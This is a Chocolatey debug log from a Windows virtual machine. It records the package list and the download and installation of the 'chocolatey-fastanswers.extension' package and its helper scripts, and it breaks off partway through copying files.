[DEBUG] -   * 'ChocolateyInstall'='C:\\ProgramData\\chocolatey' ('Machine')\n2026-06-08 18:07:08,622 4968 [DEBUG] - Unable to get parent process for 'choco'. Ignoring...\n2026-06-08 18:07:08,637 4968 [DEBUG] - Process Tree: Chocolatey CLI => Chocolatey CLI => powershell => powershell => cmd => sshd => sshd => sshd => services\n2026-06-08 18:07:08,685 4968 [DEBUG] - Updating User Agent to 'Chocolatey Command Line/2.7.2 (sshd, Chocolatey CLI) via NuGet Client/6.4.1 (Microsoft Windows NT 10.0.17763.0)'.\n2026-06-08 18:07:09,262 4968 [DEBUG] - Running list with the following filter = ''\n2026-06-08 18:07:09,282 4968 [DEBUG] - --- Start of List ---\n2026-06-08 18:07:09,356 4968 [DEBUG] - Process Tree: Chocolatey CLI => Chocolatey CLI => powershell => powershell => cmd => sshd => sshd => sshd => services\n2026-06-08 18:07:09,371 4968 [DEBUG] - Updating User Agent to 'Chocolatey Command Line/2.7.2 (sshd, Chocolatey CLI) via NuGet Client/6.4.1 (Microsoft Windows NT 10.0.17763.0)'.\n2026-06-08 18:07:09,387 4968 [DEBUG] - Resolving resource PackageSearchResource for source C:\\ProgramData\\chocolatey\\lib\n2026-06-08 18:07:10,667 4968 [DEBUG] - chocolatey 2.7.2\n2026-06-08 18:07:10,685 4968 [DEBUG] - chocolatey-windowsupdate.extension 1.0.5\n2026-06-08 18:07:10,700 4968 [DEBUG] - KB2919355 1.0.20160915\n2026-06-08 18:07:10,715 4968 [DEBUG] - KB2919442 1.0.20160915\n2026-06-08 18:07:10,715 4968 [DEBUG] - KB2999226 1.0.20181019\n2026-06-08 18:07:10,732 4968 [DEBUG] - KB3035131 1.0.3\n2026-06-08 18:07:10,747 4968 [DEBUG] - KB3118401 1.0.5\n2026-06-08 18:07:10,762 4968 [DEBUG] - virtualbox-guest-additions-guest.install 7.2.8\n2026-06-08 18:07:10,778 4968 [DEBUG] - --- End of List ---\n2026-06-08 18:07:10,809 4968 [DEBUG] - Resolving resource PackageMetadataResource for source c:\\cached-packages\n2026-06-09 18:35:56,998 4968 [DEBUG] - Resolving resource PackageMetadataResource for source https://community.chocolatey.org/api/v2/\n2026-06-09 18:35:57,915 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/Packages(Id='disable-ms-msdt',Version='1.0.0')\n2026-06-09 18:35:58,086 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/Packages(Id='disable-ms-msdt',Version='1.0.0') 159ms\n2026-06-09 18:35:58,321 4968 [DEBUG] - Resolving resource DependencyInfoResource for source c:\\cached-packages\n2026-06-09 18:35:59,276 4968 [DEBUG] - Resolving resource DependencyInfoResource for source https://community.chocolatey.org/api/v2/\n2026-06-09 18:35:59,290 4968 [INFO ] - [NuGet]   CACHE https://community.chocolatey.org/api/v2/Packages(Id='disable-ms-msdt',Version='1.0.0')\n2026-06-09 18:36:00,243 4968 [INFO ] - [NuGet]   CACHE https://community.chocolatey.org/api/v2/$metadata\n2026-06-09 18:36:00,291 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/FindPackagesById()?id='chocolatey-fastanswers.extension'&semVerLevel=2.0.0\n2026-06-09 18:36:00,399 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/FindPackagesById()?id='chocolatey-fastanswers.extension'&semVerLevel=2.0.0 112ms\n2026-06-09 18:36:00,477 4968 [INFO ] - [NuGet]   GET http://community.chocolatey.org/api/v2/FindPackagesById?id='chocolatey-fastanswers.extension'&$skiptoken='1758305999083','0.0.1','chocolatey-fastanswers.extension'\n2026-06-09 18:36:00,633 4968 [INFO ] - [NuGet]   OK http://community.chocolatey.org/api/v2/FindPackagesById?id='chocolatey-fastanswers.extension'&$skiptoken='1758305999083','0.0.1','chocolatey-fastanswers.extension' 136ms\n2026-06-09 18:36:00,947 4968 [INFO ] - [NuGet] Resolving dependency information took 0 ms\n2026-06-09 18:36:00,979 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/Packages(Id='chocolatey-fastanswers.extension',Version='0.0.2.2')\n2026-06-09 18:36:01,071 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/Packages(Id='chocolatey-fastanswers.extension',Version='0.0.2.2') 86ms\n2026-06-09 18:36:01,103 4968 [DEBUG] - Resolving resource DownloadResource for source https://community.chocolatey.org/api/v2/\n2026-06-09 18:36:01,181 4968 [DEBUG] - Attempting to delete file \"\".\n2026-06-09 18:36:01,199 4968 [INFO ] - Downloading package from source 'https://community.chocolatey.org/api/v2/'\n2026-06-09 18:36:01,199 4968 [DEBUG] - Package download location 'https://community.chocolatey.org/api/v2/package/chocolatey-fastanswers.extension/0.0.2.2'\n2026-06-09 18:36:01,258 4968 [INFO ] - [NuGet]   GET https://community.chocolatey.org/api/v2/package/chocolatey-fastanswers.extension/0.0.2.2\n2026-06-09 18:36:01,540 4968 [INFO ] - [NuGet]   OK https://community.chocolatey.org/api/v2/package/chocolatey-fastanswers.extension/0.0.2.2 285ms\n2026-06-09 18:36:01,602 4968 [INFO ] - [NuGet] Acquiring lock for the installation of chocolatey-fastanswers.extension 0.0.2.2\n2026-06-09 18:36:01,714 4968 [INFO ] - [NuGet] Acquired lock for the installation of chocolatey-fastanswers.extension 0.0.2.2\n2026-06-09 18:36:02,885 4968 [INFO ] - [NuGet] Installed chocolatey-fastanswers.extension 0.0.2.2 from https://community.chocolatey.org/api/v2/ with content hash 4ugOiehjPXN9ehrr7CmEALUfyLel7M63f5l4Zbuui4wSaQM9xgir7nxOChii/YGZYBPwG01bxz1gJFwSictd5A==.\n2026-06-09 18:36:02,915 4968 [DEBUG] - Skipping package hash validation as feature 'usePackageHashValidation' is not enabled.\n2026-06-09 18:36:02,977 4968 [INFO ] - [NuGet] Adding package 'chocolatey-fastanswers.extension.0.0.2.2' to folder 'C:\\ProgramData\\chocolatey\\lib'\n2026-06-09 18:36:03,244 4968 [INFO ] - [NuGet] Added package 'chocolatey-fastanswers.extension.0.0.2.2' to folder 'C:\\ProgramData\\chocolatey\\lib'\n2026-06-09 18:36:03,260 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\chocolatey-fastanswers.extension/0.0.2.2\\chocolatey-fastanswers.extension.0.0.2.2.nupkg\".\n2026-06-09 18:36:03,260 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\chocolatey-fastanswers.extension/0.0.2.2\\.nupkg.metadata\".\n2026-06-09 18:36:03,276 4968 [DEBUG] - Attempting to delete file \"C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey\\ChocolateyScratch\\chocolatey-fastanswers.extension/0.0.2.2\\chocolatey-fastanswers.extension.0.0.2.2.nupkg.sha512\".\n2026-06-09 18:36:03,276 4968 [INFO ] - \nchocolatey-fastanswers.extension v0.0.2.2 (forced) [Approved]\n2026-06-09 18:36:03,398 4968 [INFO ] - chocolatey-fastanswers.extension package files install completed. Performing other installation steps.\n2026-06-09 18:36:03,774 4968 [DEBUG] - Capturing package files in 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension'\n2026-06-09 18:36:03,774 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\chocolatey-fastanswers.extension.nupkg'\n  with checksum 'FBA8F1BF1832175C1620A8C99260CE63'\n2026-06-09 18:36:03,789 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\chocolatey-fastanswers.extension.nuspec'\n  with checksum '90E302921AFD6B25029F4FB0E37A0F36'\n2026-06-09 18:36:03,789 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\chocolateyinstall-helpers.psm1'\n  with checksum '3DB76ABFF352B2B31CBC75921B878A5D'\n2026-06-09 18:36:03,789 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-Is32.ps1'\n  with checksum 'EFDE1E251305B484C62BAD5FD4843C58'\n2026-06-09 18:36:03,807 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-Is64.ps1'\n  with checksum '8D81A6047FE37765124CA170D024381C'\n2026-06-09 18:36:03,807 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsAMDCPU.ps1'\n  with checksum 'B2ACDB98A75468A614E73C4358836C16'\n2026-06-09 18:36:03,822 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsAMDVideo.ps1'\n  with checksum 'CAE3CBA9F0DB6BB95BDEF80FA93FCD11'\n2026-06-09 18:36:03,822 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsARMCPU.ps1'\n  with checksum 'E335AB7EBCFD4B358B240EC3A980FCC5'\n2026-06-09 18:36:03,822 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsHyperV.ps1'\n  with checksum '34E9D441E1C1E4A0A4733CF3D08CF24F'\n2026-06-09 18:36:03,837 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsInDomain.ps1'\n  with checksum '3DFE5C92C1E885DC4F32F39700163F49'\n2026-06-09 18:36:03,837 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsIntelCPU.ps1'\n  with checksum '217C9913F0F76AF58310AD112D678755'\n2026-06-09 18:36:03,837 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsIntelVideo.ps1'\n  with checksum '59ADC0234E8C86B0C019E26C4FB7DBD5'\n2026-06-09 18:36:03,853 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsKVM.ps1'\n  with checksum '3CEEFE79AB88CED867F3C2883960BDFA'\n2026-06-09 18:36:03,853 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsMobile.ps1'\n  with checksum 'D072E3346388E862D58EEB61FADE1293'\n2026-06-09 18:36:03,868 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsNvidiaVideo.ps1'\n  with checksum 'BFAD3256D45BC0050CF912F721C39713'\n2026-06-09 18:36:03,868 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsSSD.ps1'\n  with checksum '6A4F3F45948CD3046D3EA9DE985037CB'\n2026-06-09 18:36:03,868 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVirtualBox.ps1'\n  with checksum 'C14E2427FD7E29D07BCE03F14C196C91'\n2026-06-09 18:36:03,868 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVM.ps1'\n  with checksum '33C5599D27D1DCCF04E7D17A0AEE4449'\n2026-06-09 18:36:03,884 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVMware.ps1'\n  with checksum '1447C1F98A79D75C92A3BC5C0996CBC7'\n2026-06-09 18:36:03,884 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin10.ps1'\n  with checksum '2105DD274CD2662D791CEA40652C9903'\n2026-06-09 18:36:03,884 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin11.ps1'\n  with checksum '67E96A3F5DC70F68CE2B6227526F2EBD'\n2026-06-09 18:36:03,901 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin7.ps1'\n  with checksum '57FC84EC7EB69BA5966FECC34CBE1007'\n2026-06-09 18:36:03,901 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin8.ps1'\n  with checksum 'A6B6CB4C2DE5D8E85F1FD3BDCAD9F21F'\n2026-06-09 18:36:03,919 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin80.ps1'\n  with checksum '88E31E6EC19D09785D334F267B2FF45D'\n2026-06-09 18:36:03,919 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin81.ps1'\n  with checksum 'EF83A82859194B1A73EB3A18ECA1CCFA'\n2026-06-09 18:36:03,932 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinEdu.ps1'\n  with checksum 'C49066E8C6C5F27D6D62F256D17EDBC5'\n2026-06-09 18:36:03,948 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinEnt.ps1'\n  with checksum '78645B460495920C9E2B78E3046BB3EB'\n2026-06-09 18:36:03,948 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinHome.ps1'\n  with checksum '679B402638E9E087A2EB837CFF9DE614'\n2026-06-09 18:36:03,948 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinPro.ps1'\n  with checksum 'D037F7ECC534050B6E401A2B0B66CC58'\n2026-06-09 18:36:03,964 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer.ps1'\n  with checksum 'B9D58DCC4646B675D3D151FDAFA734AF'\n2026-06-09 18:36:03,964 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2008.ps1'\n  with checksum 'C18CFE831EE863996B08BB4CAA48144A'\n2026-06-09 18:36:03,978 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2008R2.ps1'\n  with checksum '0977F15F5E8D73CA80459F7B56700341'\n2026-06-09 18:36:03,978 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2012.ps1'\n  with checksum '0E084FBDD139EFBA5EA348D5BCAA5764'\n2026-06-09 18:36:03,978 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2012R2.ps1'\n  with checksum '4B75E93E80B9803DC1A1B94692C7BCAA'\n2026-06-09 18:36:03,993 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2016.ps1'\n  with checksum '64E440FB4AD36DCD2818B1BFE1EC4676'\n2026-06-09 18:36:03,993 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2019.ps1'\n  with checksum 'D5EFA3A01193AD10EFFEBA61AB5489F9'\n2026-06-09 18:36:04,012 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2022.ps1'\n  with checksum 'C6D7B639210FBC1FBFEB24E60622B83C'\n2026-06-09 18:36:04,012 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerDatacenter.ps1'\n  with checksum '34E97A250BA09333E89B2786257B973C'\n2026-06-09 18:36:04,025 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerEssentials.ps1'\n  with checksum 'A87543351C19BECB97C64DF9DE861B09'\n2026-06-09 18:36:04,025 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerFoundation.ps1'\n  with checksum '128FD3DDF37EB204D710A05A7E8782F0'\n2026-06-09 18:36:04,025 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerSBS.ps1'\n  with checksum '58C034E640E3D63E0CC83864585A3B86'\n2026-06-09 18:36:04,040 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerStandard.ps1'\n  with checksum '2D281A2C03AC24B779B7ABC446A9E8C1'\n2026-06-09 18:36:04,040 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerStorage.ps1'\n  with checksum '46F2A8F994F668BD57568838CBE92D02'\n2026-06-09 18:36:04,040 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServerWeb.ps1'\n  with checksum 'FE4589697B0465A3D8CAE108EA997FF8'\n2026-06-09 18:36:04,056 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinWorkstation.ps1'\n  with checksum '53B0A793B9476B04B31BDE56E0AC30E5'\n2026-06-09 18:36:04,056 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsXen.ps1'\n  with checksum '2FB7192315EE3A14E35A339F8C897EA1'\n2026-06-09 18:36:04,056 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-NuspecInfo.ps1'\n  with checksum 'E5422AD665ECD9517237E09D84BC4C77'\n2026-06-09 18:36:04,072 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-PendingReboot.ps1'\n  with checksum '22EC2FE26CBA9572BBB9A213F312ACA3'\n2026-06-09 18:36:04,072 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinName.ps1'\n  with checksum '37CC42EB12EF31A01EAC25927FE00C7C'\n2026-06-09 18:36:04,072 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerBuild.ps1'\n  with checksum 'A84D4278467B3EAB48B341143D62B2C0'\n2026-06-09 18:36:04,089 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerMajor.ps1'\n  with checksum 'B7394CFD5A06F6060CD6C50E1BEEB3C7'\n2026-06-09 18:36:04,089 4968 [DEBUG] -  Found 'C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-WinVerMinor.ps1'\n  with checksum 'DA5740343F8AF56CF567197A1C898B90'\n2026-06-09 18:36:04,134 4968 [DEBUG] - Attempting to create directory \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\".\n2026-06-09 18:36:04,149 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\chocolateyinstall-helpers.psm1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\chocolateyinstall-helpers.psm1\".\n2026-06-09 18:36:04,149 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-Is32.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-Is32.ps1\".\n2026-06-09 18:36:04,167 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-Is64.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-Is64.ps1\".\n2026-06-09 18:36:04,192 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsAMDCPU.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsAMDCPU.ps1\".\n2026-06-09 18:36:04,196 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsAMDVideo.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsAMDVideo.ps1\".\n2026-06-09 18:36:04,216 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsARMCPU.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsARMCPU.ps1\".\n2026-06-09 18:36:04,216 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsHyperV.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsHyperV.ps1\".\n2026-06-09 18:36:04,227 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsInDomain.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsInDomain.ps1\".\n2026-06-09 18:36:04,227 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsIntelCPU.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsIntelCPU.ps1\".\n2026-06-09 18:36:04,227 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsIntelVideo.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsIntelVideo.ps1\".\n2026-06-09 18:36:04,244 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsKVM.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsKVM.ps1\".\n2026-06-09 18:36:04,244 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsMobile.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsMobile.ps1\".\n2026-06-09 18:36:04,259 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsNvidiaVideo.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsNvidiaVideo.ps1\".\n2026-06-09 18:36:04,259 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsSSD.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsSSD.ps1\".\n2026-06-09 18:36:04,275 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVirtualBox.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsVirtualBox.ps1\".\n2026-06-09 18:36:04,275 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVM.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsVM.ps1\".\n2026-06-09 18:36:04,291 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsVMware.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsVMware.ps1\".\n2026-06-09 18:36:04,291 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin10.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin10.ps1\".\n2026-06-09 18:36:04,308 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin11.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin11.ps1\".\n2026-06-09 18:36:04,322 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin7.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin7.ps1\".\n2026-06-09 18:36:04,322 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin8.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin8.ps1\".\n2026-06-09 18:36:04,322 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin80.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin80.ps1\".\n2026-06-09 18:36:04,338 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWin81.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWin81.ps1\".\n2026-06-09 18:36:04,338 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinEdu.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinEdu.ps1\".\n2026-06-09 18:36:04,353 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinEnt.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinEnt.ps1\".\n2026-06-09 18:36:04,353 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinHome.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinHome.ps1\".\n2026-06-09 18:36:04,353 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinPro.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinPro.ps1\".\n2026-06-09 18:36:04,391 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer.ps1\".\n2026-06-09 18:36:04,422 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2008.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2008.ps1\".\n2026-06-09 18:36:04,433 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2008R2.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2008R2.ps1\".\n2026-06-09 18:36:04,446 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2012.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2012.ps1\".\n2026-06-09 18:36:04,446 4968 [DEBUG] - Attempting to copy \"C:\\ProgramData\\chocolatey\\lib\\chocolatey-fastanswers.extension\\extensions\\Get-IsWinServer2012R2.ps1\"\n to \"C:\\ProgramData\\chocolatey\\extensions\\chocolatey-fastanswers\\Get-IsWinServer2012R2.ps1\".\n2026-06-09 18:36:04,462 4968 [DEBUG] - 